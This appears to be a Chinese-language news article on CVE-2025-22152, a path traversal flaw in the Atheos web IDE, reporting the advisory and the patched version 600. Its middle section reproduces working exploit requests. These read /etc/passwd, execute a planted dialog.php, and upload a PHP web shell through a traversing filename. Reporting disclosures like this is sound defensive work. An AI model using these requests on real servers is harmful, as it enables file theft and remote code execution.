来自 Atheos 项目的安全公告披露了一个关键漏洞 (CVE-2025-22152),该漏洞可能会危及运行基于 Web 的 IDE 框架的服务器。这个路径遍历漏洞的 CVSSv4 得分为 9.4,它使用户面临重大风险,包括未经授权的文件访问、远程代码执行和任意文件上传。
Atheos 是轻量级网络集成开发环境(IDE)Codiad 的一个现代化分叉,并得到了积极维护。该平台以最低要求和现代化工具而著称,允许开发人员在浏览器中进行编码,是简化工作流程的热门选择。然而,在 v559 之前的版本中存在一个关键缺陷,威胁着 Atheos 安装的完整性和安全性。
该公告解释说,由于多个组件对 $path 和 $target 参数的验证不当,导致该框架容易受到路径遍历攻击、未经授权的文件执行和任意文件上传。攻击者可利用该漏洞读取、修改或执行服务器上的任意文件,从而可能导致服务器全面崩溃。
该公告指出:“多个组件中的 $path 和 $target 参数未得到正确验证,允许攻击者在服务器上读取、修改或执行任意文件。”
安全公告举例说明了如何利用这些漏洞:
- 通过 download.php 或 filemanager.php 进行路径遍历
攻击者可使用处理不当的参数访问敏感的系统文件,如 /etc/passwd:
GET /components/transfer/download.php?filename=/var/www/html/workspace/../../../../etc/passwd HTTP/1.1
POST /controller.php?filename=target=filemanager&action=open&path=/etc/passwd HTTP/1.1
2. 通过 dialog.php 执行未授权代码
通过操作路径遍历参数,可以创建并执行恶意对话框文件:
Create a file named dialog.php in ${WORKSPACE}/${USERNAME}/dialog.php with malicious code.
Send a request to dialog.php, setting $target to ../workspace/${username}/dialog.php, set $action to anything not empty.
3. 任意上传文件
攻击者可利用 $filename 参数将恶意文件上传到未经授权的位置。
POST /controller.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPqrw3XyGKBzQQ04H
------WebKitFormBoundaryPqrw3XyGKBzQQ04H
Content-Disposition: form-data; name="upload[]"; filename="../../../../shell.php" <--- Path traversal vulnerability
Content-Type: text/php
<?php system($_GET["cmd"]);?>
------WebKitFormBoundaryPqrw3XyGKBzQQ04H
Content-Disposition: form-data; name="target"
transfer
------WebKitFormBoundaryPqrw3XyGKBzQQ04H
Content-Disposition: form-data; name="action"
upload
------WebKitFormBoundaryPqrw3XyGKBzQQ04H
Content-Disposition: form-data; name="path"
/var/www/html
------WebKitFormBoundaryPqrw3XyGKBzQQ04H--
CVE-2025-22152 漏洞影响 v559 之前的所有 Atheos 版本。受影响的主要组件包括:
- traits/checks.php – 路径验证的核心逻辑未能充分消毒输入。
- components/dialog.php- 易受目录遍历攻击。
- components/transfer/download.php- 支持任意文件写入。
- components/transfer/class.transfer.php – 验证不当,导致未经授权的对话框执行和恶意上传。
公告中详细指出,根本原因是 “路径或目标参数缺乏稳健的输入验证”。
Atheos 项目发布了 600 版本来解决这些漏洞。该补丁程序在所有服务器端组件中采用了更严格的消毒和验证规则,取代了有缺陷的路径验证逻辑。主要改进包括:
- cleanPath- 删除不安全字符并规范化路径,以防止遍历。
- checkPath- 根据用户权限和允许的目录验证路径。
强烈建议用户升级到 600 或更高版本,以降低这些关键风险。